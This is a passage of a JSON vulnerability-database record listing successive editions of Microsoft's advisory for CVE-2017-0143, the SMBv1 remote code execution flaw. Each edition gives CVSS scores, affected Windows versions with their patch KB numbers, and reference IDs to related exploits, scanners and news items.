"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-18T18:44:54", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-18T18:44:54", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-18T18:44:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:54", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T00:58:24", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T00:58:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T00:58:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3205409", "KB4012212", "KB4012213", "KB3212646", "KB3210720", "KB3177186", "KB4012606", "KB4012214", "KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4013429", "KB4012598", "KB4013198", "KB3205401", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:24", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T08:49:10", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 